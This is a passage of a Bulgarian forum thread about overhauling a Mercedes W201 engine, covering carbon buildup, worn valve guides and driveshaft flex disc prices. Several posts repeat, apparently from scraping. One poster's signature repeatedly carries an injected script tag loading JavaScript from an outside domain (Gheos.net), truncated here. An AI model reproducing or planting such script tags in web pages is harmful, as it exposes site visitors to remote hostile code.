Основен ремонт и още нещо!W201
Започната от bon_bonev, 25 яну 2009 - 00:34:17
55 мнения по тази тема
#16
Публикувано 31 януари 2009 - 11:57
Ухааааааааааааааааааааааа!!!!!!!!!! Не мога да повярвам!! Това показва колко е издръжлив този мотор ....... Сигурно има 1кг. нагар
#17
Публикувано 31 януари 2009 - 12:40
имах един случай, една 124ка, не искаше да гасне. по-точно за 2ри път виждах такова.
Та човека искаше да я опревя.
Работи, вадиш ключа-продължава да работи на ПХ, махаш кабела на бобината--пак работи, още около поне 10сек.
та ми беше ясно че е нагар. (тлее)
като отворих мотора..... около 4мм нагар на всеки цилиндър.... клапаните също
разглобих тотално мотора, почистих, сглобих, сегментите дори нямаха нужда от смяна, нови лагери.. и заработи като нов.най-вече гаснеше с ключа.
причината беше от клапаните. водачите имаха огромен луфт, а гумичките бяха на парчета.
Та човека искаше да я опревя.
Работи, вадиш ключа-продължава да работи на ПХ, махаш кабела на бобината--пак работи, още около поне 10сек.
та ми беше ясно че е нагар. (тлее)
като отворих мотора..... около 4мм нагар на всеки цилиндър.... клапаните също
разглобих тотално мотора, почистих, сглобих, сегментите дори нямаха нужда от смяна, нови лагери.. и заработи като нов.най-вече гаснеше с ключа.
причината беше от клапаните. водачите имаха огромен луфт, а гумичките бяха на парчета.
#18
Публикувано 31 януари 2009 - 12:59
Не знам дали ти се занимава и дали не си събрал вече всичко,ама така и така отваряш мотора и го разглобяваш,защо не изсчистиш около мотора коша,да боядисаш колектори,глави ,капаци-да лъсне всичко(ако мислиш да си караш колата по дълго време)
#19
Публикувано 31 януари 2009 - 14:34
Наистина нагара не е малко, но проблеми с палене гасене не съм имал. При мен водачите също бяха износени . Ето ги новите-
PIC_4425.JPG 1,09MB 189 Брой сваляния
гумичките са цели но са на камък
PIC_4439.JPG 1,39MB 170 Брой сваляния
неочаквано за много от вас ще кажа , че преди да почна ремонта колата работеше доста прилично. Добре съм я поддържал и обслужвал. Представям си ,ако не го правех на какво щеше да прилича сега .
Предния кош има нужда по скоро от измиване от колкото от боя.
PIC_4425.JPG 1,09MB 189 Брой сваляния
гумичките са цели но са на камък
PIC_4439.JPG 1,39MB 170 Брой сваляния
неочаквано за много от вас ще кажа , че преди да почна ремонта колата работеше доста прилично. Добре съм я поддържал и обслужвал. Представям си ,ако не го правех на какво щеше да прилича сега .
Предния кош има нужда по скоро от измиване от колкото от боя.
W201 M102.962 <script
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
#20
Публикувано 31 януари 2009 - 14:39
1991 190E SportLine turbo 0.6bar
#21
Публикувано 31 януари 2009 - 17:59
Представям си щом в това състояние си е работела добре,какво трябва да е вътре за да работи зле!!. Железен мотор... кой знае и при мене какво е .. колега ако не е тайна ще кажеш ли колко ще ти се върже ремонта ?
#22
Публикувано 31 януари 2009 - 19:55
Отличник е колегата!!
Много занемарени коли по нашите и чуждите пътища съм видял , ти си нещо като идол за хората които имат интерес да си оправят (реставрират) колите!
ПС: Аз още чакам да ми върнат моторетката от бояджията ... да я направя като хората (цялата информация я има в подписа, ключова дума: Пърпоретката )
Много занемарени коли по нашите и чуждите пътища съм видял , ти си нещо като идол за хората които имат интерес да си оправят (реставрират) колите!
ПС: Аз още чакам да ми върнат моторетката от бояджията ... да я направя като хората (цялата информация я има в подписа, ключова дума: Пърпоретката )
#23
Публикувано 01 февруари 2009 - 00:24
Представям си щом в това състояние си е работела добре,какво трябва да е вътре за да работи зле!!. Железен мотор... кой знае и при мене какво е .. колега ако не е тайна ще кажеш ли колко ще ти се върже ремонта ?
нека всичко приключи успешно, пък после ще "рапортувам" пред форума.
Отличник е колегата!!
Много занемарени коли по нашите и чуждите пътища съм видял , ти си нещо като идол за хората които имат интерес да си оправят (реставрират) колите!
Тва с идола ме забавлява доста
W201 M102.962 <script
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
#25
Публикувано 02 февруари 2009 - 14:49
евала на колегата ... темата много ме заинтригува. някак си ми се стопля сърцето като гледам че още има хора които си обичат колите и се грижат така старателно за тях. хубаво е и че си разбираш и няма да те премятат някви "майстори"
ще следя с интерес темата и ще чакам да видя колко ти е излезнал ремонта за да разбера колко луд (в добрия смисъл на думата) си
мн се радвах и на реставрацията на пухчето ... тия машинки колко съм ги юркал като малък... корава работа са и те - колега и теб ще те чакаме да покажеш в готов вид така наречената парпуретка
ще следя с интерес темата и ще чакам да видя колко ти е излезнал ремонта за да разбера колко луд (в добрия смисъл на думата) си
мн се радвах и на реставрацията на пухчето ... тия машинки колко съм ги юркал като малък... корава работа са и те - колега и теб ще те чакаме да покажеш в готов вид така наречената парпуретка
#26
Публикувано 02 февруари 2009 - 23:22
днес си купих и ново предно каре на кардана .
DSC00042.JPG 372,74K 110 Брой сваляния
предложиха ми това- такси вариант
DSC00043.JPG 267,88K 105 Брой сваляния
аз взех това-
DSC00040.JPG 264,67K 86 Брой сваляния
и двете са лемфьордер. и двете стават на 190-ката . цената на второто е по-висока с около 30%.
DSC00042.JPG 372,74K 110 Брой сваляния
предложиха ми това- такси вариант
DSC00043.JPG 267,88K 105 Брой сваляния
аз взех това-
DSC00040.JPG 264,67K 86 Брой сваляния
и двете са лемфьордер. и двете стават на 190-ката . цената на второто е по-висока с около 30%.
W201 M102.962 <script
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
#27
Публикувано 03 февруари 2009 - 00:09
колега, би ли споделил цените?
#28
Публикувано 03 февруари 2009 - 07:34
такси варианта- 85 лв. / с отстъпка- 65 лв./
демпферния вариант- 125 лв. / с отстъпка- 90 лв./
имаше и SWAG на същите цени.
демпферния вариант- 125 лв. / с отстъпка- 90 лв./
имаше и SWAG на същите цени.
W201 M102.962 <script
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
#29
Публикувано 04 февруари 2009 - 12:24
M/у LMI и SWAG,по-добре LMI ..... FEBI и SWAG са две еднакви фирми Едната пакетира за другата и така .... Мойте карета и двете са като тези за такситата (кръгли не като осмоъгълник ) Момчето на което беше колата работи при Петко и каза че тез кръглите са по-добри от другите Оригинално не е така,но при мен е така и до сега нямам оплаквания! Марка не съм заглеждал,не мога да кажа със сигурност
#30
Публикувано 04 февруари 2009 - 12:33
днес си купих и ново предно каре на кардана .
DSC00042.JPG 372,74K 110 Брой сваляния
предложиха ми това- такси вариант
DSC00043.JPG 267,88K 105 Брой сваляния
аз взех това-
DSC00040.JPG 264,67K 86 Брой сваляния
и двете са лемфьордер. и двете стават на 190-ката . цената на второто е по-висока с около 30%.
Не съм привърженик на каретата за таксита.Изкарват повечко наистина,но са по-твърди и не обират меко напъните,което пък води до разбиване на възлите в двата края на кардана.Пълно щастие няма!
П.С. Лемфьордера ти е истински-споко,ще изкара доста!
0 потребител(и) четат тази тема
0 потребители, 0 гости, 0 анонимни